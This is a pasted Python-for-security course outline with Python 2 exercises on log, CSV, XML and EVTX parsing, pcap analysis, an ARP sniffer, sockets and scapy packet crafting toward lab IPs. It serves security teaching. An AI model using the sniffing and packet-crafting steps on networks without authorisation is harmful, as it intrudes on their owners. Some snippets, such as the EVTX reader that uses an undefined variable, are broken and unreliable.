Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Here is the Day 1 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_5_rec-lw-us-4_240269_recording.mp4
- Here is the Day 2 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_7_rec-hq-3_241310_recording.mp4
- Here is the Day 3 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_11_rec-lw-us-7_243144_recording.mp4
- Here is the Day 4 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_14_rec-hq-6_244377_recording.mp4
- Here is the Day 5 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_18_rec-hq-6_246395_recording.mp4
- Here is the Day 6 Video:
- https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_20_rec-hq-2_247633_recording.mp4
- #########################################
- # Here is the courseware for this month #
- #########################################
- Class powerpoint slides:
- https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx
- Courseware Lab Manual
- https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf
- https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
- username: strategicsec
- password: strategicsec
- The youtube video playlist that I'd like for you to watch is located here:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
- ##############################
- # Installing Python in Linux #
- ##############################
- The first thing that you will need to do is install dpkt.
- sudo apt-get install -y idle
- Open IDLE, and let's just dive right in.
- #############################
- # Lesson 1: Simple Printing #
- #############################
- >>> print "Today we are learning Python."
- #####################################
- # Lesson 2: Simple Numbers and Math #
- #####################################
- >>> 2+2
- >>> 6-3
- >>> 18/7
- >>> 18.0/7
- >>> 18.0/7.0
- >>> 18/7
- >>> 9%4
- >>> 8%4
- >>> 8.75%.5
- >>> 6.*7
- >>> 6*6*6
- >>> 6**3
- >>> 5**12
- >>> -5**4
- #######################
- # Lesson 3: Variables #
- #######################
- >>> x=18
- >>> x+15
- >>> x**3
- >>> y=54
- >>> x+y
- >>> g=input("Enter number here: ")
- 43
- >>> g+32
- >>> g**3
- ###################################
- # Lesson 4: Modules and Functions #
- ###################################
- >>> 5**4
- >>> pow(5,4)
- >>> abs(-18)
- >>> abs(5)
- >>> floor(18.7)
- >>> import math
- >>> math.floor(18.7)
- >>> math.sqrt(81)
- >>> joe = math.sqrt
- >>> joe(9)
- >>> joe=math.floor
- >>> joe(19.8)
- ##################################
- # Lesson 5: How to Save Programs #
- ##################################
- Run "IDLE (Python GUI)"
- File -> New Window
- print "Python for InfoSec"
- File -> Save as
- py4InfoSec.py
- Run -> Run Module or Press "F5"
- Create a file name.py
- x = raw_input("Enter name: ")
- print "Hey " + x
- raw_input("Press<enter>")
- Run -> Run Module or Press "F5"
- #####################
- # Lesson 6: Strings #
- #####################
- >>> "XSS"
- >>> 'SQLi'
- >>> "Joe's a python lover"
- >>> 'Joe\'s a python lover'
- >>> "Joe said \"InfoSec is fun\" to me"
- >>> a = "Joe"
- >>> b = "McCray"
- >>> a, b
- >>> a+b
- ##########################
- # Lesson 7: More Strings #
- ##########################
- >>> num = 10
- >>> num + 2
- >>> "The number of open ports found on this system is " + num
- >>> num = str(18)
- >>> "There are " + num + " vulnerabilities found in this environment."
- >>> num2 = 46
- >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
- #######################
- # Lesson 8: Raw Input #
- #######################
- Run "IDLE (Python GUI)"
- File -> New Window
- joemccray=input("Enter name: ")
- print joemccray
- Run -> Run Module # Will throw an error
- or
- Press "F5"
- File -> New Window
- joemccray=raw_input("Enter name: ")
- Run -> Run Module # Will throw an error
- or
- Press "F5"
- NOTE:
- Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
- #################################
- # Lesson 9: Sequences and Lists #
- #################################
- >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
- >>> attacks
- ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
- >>> attacks[3]
- 'SQL Injection'
- >>> attacks[-2]
- 'Cross-Site Scripting'
- ##########################
- # Level 10: If Statement #
- ##########################
- Run "IDLE (Python GUI)"
- File -> New Window
- attack="SQLI"
- if attack=="SQLI":
- print 'The attacker is using SQLI'
- Run -> Run Module or Press "F5"
- File >> New Window
- attack="XSS"
- if attack=="SQLI":
- print 'The attacker is using SQLI'
- Run -> Run Module or Press "F5"
- #############################
- # Reference Videos To Watch #
- #############################
- Here is your first set of youtube videos that I'd like for you to watch:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
- #####################################
- # Lession 11: Intro to Log Analysis #
- #####################################
- Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
- https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
- username: strategicsec
- password: strategicsec
- Then execute the following commands:
- ---------------------------------------------------------------------------------------------------------
- wget https://s3.amazonaws.com/SecureNinja/Python/access_log
- cat access_log | grep 141.101.80.188
- cat access_log | grep 141.101.80.187
- cat access_log | grep 108.162.216.204
- cat access_log | grep 173.245.53.160
- ---------------------------------------------------------
- Google the following terms:
- - Python read file
- - Python read line
- - Python read from file
- #########################################################
- # Lession 12: Use Python to read in a file line by line #
- #########################################################
- Reference:
- http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
- ---------------------------------------------------------
- vi logread1.py
- ## Open the file with read only permit
- f = open('access_log', "r")
- ## use readlines to read all lines in the file
- ## The variable "lines" is a list containing all lines
- lines = f.readlines()
- print lines
- ## close the file after reading the lines.
- f.close()
- ---------------------------------------------------------
- Google the following:
- - python difference between readlines and readline
- - python readlines and readline
- #################################
- # Lession 13: A quick challenge #
- #################################
- Can you write an if/then statement that looks for this IP and print "Found it"?
- 141.101.81.187
- ---------------------------------------------------------
- Hint 1: Use Python to look for a value in a list
- Reference:
- http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
- ---------------------------------------------------------
- Hint 2: Use Python to prompt for user input
- Reference:
- http://www.cyberciti.biz/faq/python-raw_input-examples/
- ---------------------------------------------------------
- Hint 3: Use Python to search for a string in a list
- Reference:
- http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
- Here is one student's solution - can you please this code to me?
- #!/usr/bin/python
- f = open('access_log')
- strUsrinput = raw_input("Enter IP Address: ")
- for line in iter(f):
- ip = line.split(" - ")[0]
- if ip == strUsrinput:
- print line
- f.close()
- -------------------------------
- Working with another student after class we came up with another solution:
- #!/usr/bin/env python
- # This line opens the log file
- f=open('access_log',"r")
- # This line takes each line in the log file and stores it as an element in the list
- lines = f.readlines()
- # This lines stores the IP that the user types as a var called userinput
- userinput = raw_input("Enter the IP you want to search for: ")
- # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
- for ip in lines:
- if ip.find(userinput) != -1:
- print ip
- ##################################################
- # Lession 14: Look for web attacks in a log file #
- ##################################################
- In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
- Supported attacks:
- 1. SQL Injection
- 2. Local File Inclusion
- 3. Remote File Inclusion
- 4. Cross-Site Scripting
- wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
- The usage for scan_log.py is simple. You feed it an apache log file.
- cat scan_log.py | less (use your up/down arrow keys to look through the file)
- Explain to me how this script works.
- ################################
- # Lesson 15: Parsing CSV Files #
- ################################
- Dealing with csv files
- Reference:
- http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
- Type the following commands:
- ---------------------------------------------------------------------------------------------------------
- wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv
- Example 1 - Reading CSV files
- -----------------------------
- #To be able to read csv formated files, we will first have to import the
- #csv module.
- import csv
- with open('class_nessus.csv', 'rb') as f:
- reader = csv.reader(f)
- for row in reader:
- print row
- Example 2 - Reading CSV files
- -----------------------------
- vi readcsv.py
- #!/usr/bin/python
- import csv # imports the csv module
- import sys # imports the sys module
- f = open(sys.argv[1], 'rb') # opens the csv file
- try:
- reader = csv.reader(f) # creates the reader object
- for row in reader: # iterates the rows of the file in orders
- print row # prints each row
- finally:
- f.close() # closing
- Example 3 - - Reading CSV files
- -------------------------------
- vi readcsv2.py
- #!/usr/bin/python
- # This program will then read it and displays its contents.
- import csv
- ifile = open('class_nessus.csv', "rb")
- reader = csv.reader(ifile)
- rownum = 0
- for row in reader:
- # Save header row.
- if rownum == 0:
- header = row
- else:
- colnum = 0
- for col in row:
- print '%-8s: %s' % (header[colnum], col)
- colnum += 1
- rownum += 1
- ifile.close()
- python readcsv2.py | less
- /---------------------------------------------------/
- --------------------PARSING CSV FILES----------------
- /---------------------------------------------------/
- -------------TASK 1------------
- vi readcsv3.py
- #!/usr/bin/python
- import csv
- f = open('class_nessus.csv', 'rb')
- try:
- rownum = 0
- reader = csv.reader(f)
- for row in reader:
- #Save header row.
- if rownum == 0:
- header = row
- else:
- colnum = 0
- if row[3].lower() == 'high':
- print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
- rownum += 1
- finally:
- f.close()
- python readcsv3.py | less
- -------------TASK 2------------
- vi readcsv4.py
- #!/usr/bin/python
- import csv
- f = open('class_nessus.csv', 'rb')
- try:
- print '/---------------------------------------------------/'
- rownum = 0
- hosts = {}
- reader = csv.reader(f)
- for row in reader:
- # Save header row.
- if rownum == 0:
- header = row
- else:
- colnum = 0
- if row[3].lower() == 'high' and row[4] not in hosts:
- hosts[row[4]] = row[4]
- print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
- rownum += 1
- finally:
- f.close()
- python readcsv4.py | less
- ################################
- # Lesson 16: Parsing XML Files #
- ################################
- /---------------------------------------------------/
- --------------------PARSING XML FILES----------------
- /---------------------------------------------------/
- Type the following commands:
- ---------------------------------------------------------------------------------------------------------
- wget https://s3.amazonaws.com/SecureNinja/Python/samplescan.xml
- wget https://s3.amazonaws.com/SecureNinja/Python/application.xml
- wget https://s3.amazonaws.com/SecureNinja/Python/security.xml
- wget https://s3.amazonaws.com/SecureNinja/Python/system.xml
- wget https://s3.amazonaws.com/SecureNinja/Python/sc_xml.xml
- -------------TASK 1------------
- vi readxml1.py
- #!/usr/bin/python
- from xmllib import attributes
- from xml.dom.minidom import toxml
- from xml.dom.minidom import firstChild
- from xml.dom import minidom
- xmldoc = minidom.parse('sc_xml.xml')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('host')
- count = 0
- for node in nodes:
- os = node.getElementsByTagName('os')[0]
- osclasses = os.getElementsByTagName('osclass')
- for osclass in osclasses:
- if osclass.attributes['osfamily'].value == 'Windows' and osclass.attributes['osgen'].value == 'XP':
- try:
- print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value)
- except:
- print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value)
- -------------TASK 2------------
- vi readxml2.py
- #!/usr/bin/python
- from xmllib import attributes
- from xml.dom.minidom import toxml
- from xml.dom.minidom import firstChild
- from xml.dom import minidom
- xmldoc = minidom.parse('sc_xml.xml')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('host')
- count = 0
- for node in nodes:
- portsNode = node.getElementsByTagName('ports')[0]
- ports = portsNode.getElementsByTagName('port')
- for port in ports:
- if port.attributes['portid'].value == '22' and port.attributes['protocol'].value == 'tcp':
- state = port.getElementsByTagName('state')[0]
- if state.attributes['state'].value == 'open':
- try:
- print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : 22')
- except:
- print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : 22')
- -------------TASK 3------------
- vi readxml3.py
- #!/usr/bin/python
- from xmllib import attributes
- from xml.dom.minidom import toxml
- from xml.dom.minidom import firstChild
- from xml.dom import minidom
- xmldoc = minidom.parse('sc_xml.xml')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('host')
- count = 0
- for node in nodes:
- portsNode = node.getElementsByTagName('ports')[0]
- ports = portsNode.getElementsByTagName('port')
- flag = 0
- for port in ports:
- if flag == 0:
- if port.attributes['protocol'].value == 'tcp' and (port.attributes['portid'].value == '443' or port.attributes['portid'].value == '80'):
- state = port.getElementsByTagName('state')[0]
- if state.attributes['state'].value == 'open':
- try:
- print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : '+port.attributes['portid'].value)
- except:
- print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : '+port.attributes['portid'].value)
- flag = 1
- -------------TASK 4------------
- vi readxml4.py
- #!/usr/bin/python
- from xmllib import attributes
- from xml.dom.minidom import toxml
- from xml.dom.minidom import firstChild
- from xml.dom import minidom
- xmldoc = minidom.parse('sc_xml.xml')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('host')
- count = 0
- for node in nodes:
- flag = 0
- naddress = ''
- addresses = node.getElementsByTagName('address')
- for address in addresses:
- if address.attributes['addrtype'].value == 'ipv4' and address.attributes['addr'].value[0:6] == '10.57.':
- naddress = address.attributes['addr'].value
- flag = 1
- if flag == 1:
- portsNode = node.getElementsByTagName('ports')[0];
- ports = portsNode.getElementsByTagName('port')
- flag = 0
- for port in ports:
- status = {}
- if port.attributes['protocol'].value == 'tcp' and port.attributes['portid'].value[0:2] == '22':
- state = port.getElementsByTagName('state')[0]
- if "open" in state.attributes['state'].value:
- status[0] = state.attributes['state'].value
- status[1] = port.attributes['portid'].value
- flag = 1
- else:
- flag = 0
- if port.attributes['protocol'].value == 'tcp' and flag == 1:
- if port.attributes['portid'].value == '80' or port.attributes['portid'].value == '443':
- state = port.getElementsByTagName('state')[0]
- if state.attributes['state'].value == 'open':
- flag = 0
- try:
- print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value)
- except:
- print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value)
- ################################
- # Lesson 17: Parsing EVTX Logs #
- ################################
- /---------------------------------------------------/
- --------------------PARSING EVTX FILES----------------
- /---------------------------------------------------/
- Type the following commands:
- ---------------------------------------------------------------------------------------------------------
- wget https://s3.amazonaws.com/SecureNinja/Python/Program-Inventory.evtx
- wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Application.evtx
- wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Security.evtx
- wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_System.evtx
- -------------TASK 1------------
- vi readevtx1.py
- import mmap
- import re
- import contextlib
- import sys
- import operator
- import HTMLParser
- from xml.dom import minidom
- from operator import itemgetter, attrgetter
- from Evtx.Evtx import FileHeader
- from Evtx.Views import evtx_file_xml_view
- pars = HTMLParser.HTMLParser()
- print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>')
- file_name = str(raw_input('Enter EVTX file name without extension : '))
- file_name = 'WIN-M751BADISCT_System'
- with open(file_name+'.evtx', 'r') as f:
- with contextlib.closing(mmap.mmap(f.fileno(), 0,
- access=mmap.ACCESS_READ)) as buf:
- fh = FileHeader(buf, 0x0)
- xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
- try:
- for xml, record in evtx_file_xml_view(fh):
- xml_file += xml
- except:
- pass
- xml_file += "</Events>"
- xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
- xml_file = re.sub('<local>', '<local></local>', xml_file)
- xml_file = re.sub('&', '&', xml_file)
- f = open(file_name+'.xml', 'w')
- f.write(xml_file)
- f.close()
- try:
- xmldoc = minidom.parse(file_name+'.xml')
- except:
- sys.exit('Invalid file...')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('Event')
- event_num = int(raw_input('How many events you want to show : '))
- length = int(len(nodes)) - 1
- event_id = 0
- if event_num > length:
- sys.exit('You have entered an ivalid num...')
- while True:
- if event_num > 0 and length > -1:
- try:
- event_id = nodes[length].getElementsByTagName('EventID')[0].childNodes[0].nodeValue
- try:
- print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue)
- except:
- print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found')
- event_num -= 1
- length -= 1
- except:
- length -= 1
- else:
- sys.exit('...Search Complete...')
- -------------TASK 2------------
- vi readevtx2.py
- import mmap
- import re
- import contextlib
- import sys
- import operator
- import HTMLParser
- from xml.dom import minidom
- from operator import itemgetter, attrgetter
- from Evtx.Evtx import FileHeader
- from Evtx.Views import evtx_file_xml_view
- pars = HTMLParser.HTMLParser()
- print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>')
- file_name = str(raw_input('Enter EVTX file name without extension : '))
- file_name = 'WIN-M751BADISCT_System'
- with open(file_name+'.evtx', 'r') as f:
- with contextlib.closing(mmap.mmap(f.fileno(), 0,
- access=mmap.ACCESS_READ)) as buf:
- fh = FileHeader(buf, 0x0)
- xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
- try:
- for xml, record in evtx_file_xml_view(fh):
- xml_file += xml
- except:
- pass
- xml_file += "</Events>"
- xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
- xml_file = re.sub('<local>', '<local></local>', xml_file)
- xml_file = re.sub('&', '&', xml_file)
- f = open(file_name+'.xml', 'w')
- f.write(xml_file)
- f.close()
- try:
- xmldoc = minidom.parse(file_name+'.xml')
- except:
- sys.exit('Invalid file...')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('Event')
- event = int(raw_input('Enter Event ID : '))
- event_id = 0
- for node in nodes:
- try:
- event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
- if int(event_id) == event:
- try:
- print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue)
- except:
- print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found')
- except:
- continue
- sys.exit('...Search Complete...')
- -------------TASK 3------------
- vi readevtx3.py
- import mmap
- import re
- import contextlib
- import sys
- import operator
- import HTMLParser
- from xml.dom import minidom
- from operator import itemgetter, attrgetter
- from Evtx.Evtx import FileHeader
- from Evtx.Views import evtx_file_xml_view
- pars = HTMLParser.HTMLParser()
- print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>')
- file_name = str(raw_input('Enter EVTX file name without extension : '))
- file_name = 'WIN-M751BADISCT_System'
- with open(file_name+'.evtx', 'r') as f:
- with contextlib.closing(mmap.mmap(f.fileno(), 0,
- access=mmap.ACCESS_READ)) as buf:
- fh = FileHeader(buf, 0x0)
- xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
- try:
- for xml, record in evtx_file_xml_view(fh):
- xml_file += xml
- except:
- pass
- xml_file += "</Events>"
- xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
- xml_file = re.sub('<local>', '<local></local>', xml_file)
- xml_file = re.sub('&', '&', xml_file)
- f = open(file_name+'.xml', 'w')
- f.write(xml_file)
- f.close()
- try:
- xmldoc = minidom.parse(file_name+'.xml')
- except:
- sys.exit('Invalid file...')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('Event')
- event = int(raw_input('Enter Event ID : '))
- event_id = 0
- event_count = 0;
- for node in nodes:
- try:
- event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
- if int(event_id) == event:
- event_count += 1
- except:
- continue
- print '%-8s: %s - %-8s: %s' % ('Event ID',event,'Count',event_count)
- sys.exit('...Search Complete...')
- -------------TASK 4------------
- vi readevtx4.py
- import mmap
- import re
- import contextlib
- import sys
- import operator
- import HTMLParser
- from xml.dom import minidom
- from operator import itemgetter, attrgetter
- from Evtx.Evtx import FileHeader
- from Evtx.Views import evtx_file_xml_view
- pars = HTMLParser.HTMLParser()
- print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>')
- file_name = str(raw_input('Enter EVTX file name without extension : '))
- file_name = 'WIN-M751BADISCT_System'
- with open(file_name+'.evtx', 'r') as f:
- with contextlib.closing(mmap.mmap(f.fileno(), 0,
- access=mmap.ACCESS_READ)) as buf:
- fh = FileHeader(buf, 0x0)
- xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
- try:
- for xml, record in evtx_file_xml_view(fh):
- xml_file += xml
- except:
- pass
- xml_file += "</Events>"
- xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
- xml_file = re.sub('<local>', '<local></local>', xml_file)
- xml_file = re.sub('&', '&', xml_file)
- f = open(file_name+'.xml', 'w')
- f.write(xml_file)
- f.close()
- try:
- xmldoc = minidom.parse(file_name+'.xml')
- except:
- sys.exit('Invalid file...')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('Event')
- events = []
- event_id = 0
- count = 0
- for node in nodes:
- try:
- event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
- try:
- events.append({'event_id' : int(event_id), 'event_name' : node.getElementsByTagName('string')[1].childNodes[0].nodeValue})
- except:
- events.append({'event_id' : int(event_id), 'event_name' : 'Name not found...'})
- count += 1
- except:
- continue
- events = sorted(events, key=itemgetter('event_id'))
- for e in events:
- print e
- sys.exit('...Search Complete...')
- #################################################
- # Lesson 18: Parsing Packets with Python's DPKT #
- #################################################
- The first thing that you will need to do is install dpkt.
- sudo apt-get install -y python-dpkt
- Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'.
- Run tcpdump to capture a .pcap file that we will use for the next exercise
- sudo tcpdump -ni eth0 -s0 -w quick.pcap
- --open another command prompt--
- wget http://packetlife.net/media/library/12/tcpdump.pdf
- Let's do something simple:
- vi quickpcap.py
- --------------------------------------------------------
- #!/usr/bin/python
- import dpkt;
- # Simple script to read the timestamps in a pcap file
- # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
- f = open("quick.pcap","rb")
- pcap = dpkt.pcap.Reader(f)
- for ts, buf in pcap:
- print ts;
- f.close();
- --------------------------------------------------------
- Now let's run the script we just wrote
- python quickpcap.py
- How dpkt breaks down a packet:
- Reference:
- http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
- src: the MAC address of SOURCE.
- dst: The MAC address of DESTINATION
- type: The protocol type of contained ethernet payload.
- The allowed values are listed in the file "ethernet.py",
- such as:
- a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
- b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
- References:
- http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
- Ok - now let's have a look at pcapparsing.py
- sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
- --open another command prompt--
- wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
- Ok - now let's have a look at pcapparsing.py
- --------------------------------------------------------
- import socket
- import dpkt
- import sys
- f = open('capture-100.pcap','r')
- pcapReader = dpkt.pcap.Reader(f)
- for ts,data in pcapReader:
- ether = dpkt.ethernet.Ethernet(data)
- if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
- ip = ether.data
- tcp = ip.data
- src = socket.inet_ntoa(ip.src)
- srcport = tcp.sport
- dst = socket.inet_ntoa(ip.dst)
- dstport = tcp.dport
- print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
- f.close()
- --------------------------------------------------------
- OK - let's run it:
- python pcapparsing.py
- running this script might throw an error like this:
- Traceback (most recent call last):
- File "pcapparsing.py", line 9, in <module>
- if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
- If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
- Your homework for today...
- Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
- Your challenge is to fix the Traceback error
- #!/usr/bin/python
- import pcapy
- import dpkt
- import sys
- import socket
- import struct
- SINGLE_SHOT = False
- # list all the network devices
- pcapy.findalldevs()
- iface = "eth0"
- filter = "arp"
- max_bytes = 1024
- promiscuous = False
- read_timeout = 100 # in milliseconds
- pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
- pc.setfilter( filter )
- # callback for received packets
- def recv_pkts( hdr, data ):
- packet = dpkt.ethernet.Ethernet( data )
- print type( packet.data )
- print "ipsrc: %s, ipdst: %s" %( \
- socket.inet_ntoa( packet.data.spa ), \
- socket.inet_ntoa( packet.data.tpa ) )
- print "macsrc: %s, macdst: %s " % (
- "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
- "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )
- if SINGLE_SHOT:
- header, data = pc.next()
- sys.exit(0)
- else:
- packet_limit = -1 # infinite
- pc.loop( packet_limit, recv_pkts ) # capture packets
- #############################
- # Reference Videos To Watch #
- #############################
- Here is your second set of youtube videos that I'd like for you to watch:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)
- #############################################
- # Lesson 19: Python Sockets & Port Scanning #
- #############################################
- $ ncat -l -v -p 1234
- --open another terminal--
- python
- >>> import socket
- >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- >>> s.connect(('localhost', 1234))
- >>> s.send('Hello, world')
- >>> data = s.recv(1024)
- >>> s.close()
- >>> print 'Received', 'data'
- ########################################
- # Lesson 20: TCP Client and TCP Server #
- ########################################
- vi tcpclient.py
- #!/usr/bin/python
- # tcpclient.py
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- hostport = ("127.0.0.1", 1337)
- s.connect(hostport)
- s.send("Hello\n")
- buf = s.recv(1024)
- print "Received", buf
- vi tcpserver.py
- #!/usr/bin/python
- # tcpserver.py
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- hostport = ("", 1337)
- s.bind(hostport)
- s.listen(10)
- while 1:
- cli,addr = s.accept()
- print "Connection from", addr
- buf = cli.recv(1024)
- print "Received", buf
- if buf == "Hello\n":
- cli.send("Server ID 1\n")
- cli.close()
- python tcpserver.py
- --open another terminal--
- python tcpclient.py
- ########################################
- # Lesson 21: UDP Client and UDP Server #
- ########################################
- vi udpclient.py
- #!/usr/bin/python
- # udpclient.py
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- hostport = ("127.0.0.1", 1337)
- s.sendto("Hello\n", hostport)
- buf = s.recv(1024)
- print buf
- vi udpserver.py
- #!/usr/bin/python
- # udpserver.py
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- hostport = ("127.0.0.1", 1337)
- s.bind(hostport)
- while 1:
- buf, address = s.recvfrom(1024)
- print buf
- if buf == "Hello\n":
- s.sendto("Server ID 1\n", address)
- python udpserver.py
- --open another terminal--
- python udpclient.py
- ###############################
- # Lesson 22: Installing Scapy #
- ###############################
- sudo apt-get update
- sudo apt-get install python-scapy python-pyx python-gnuplot
- Reference Page For All Of The Commands We Will Be Running:
- http://samsclass.info/124/proj11/proj17-scapy.html
- Great slides for Scapy:
- http://www.secdev.org/conf/scapy_csw05.pdf
- To run Scapy interactively
- sudo scapy
- ################################################
- # Lesson 23: Sending ICMPv4 Packets with scapy #
- ################################################
- In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
- i = IP()
- This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
- i.display()
- Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
- i.dst="10.65.75.49"
- i.display()
- Notice that scapy automatically fills in your machine's source IP address.
- Use these commands to create an object named ic of type ICMP and display its properties:
- ic = ICMP()
- ic.display()
- Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
- sr1(i/ic)
- This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply.
- The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
- Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
- sr1(i/ic/"YOUR NAME")
- You should see a reply with a Raw section containing your name.
- ##############################################
- # Lesson 24: Sending a UDP Packet with Scapy #
- ##############################################
- Preparing the Target
- $ ncat -ulvp 4444
- --open another terminal--
- In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
- u = UDP()
- u.display()
- This creates an object named u of type UDP, and displays its properties.
- Execute these commands to change the destination port to 4444 and display the properties again:
- i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
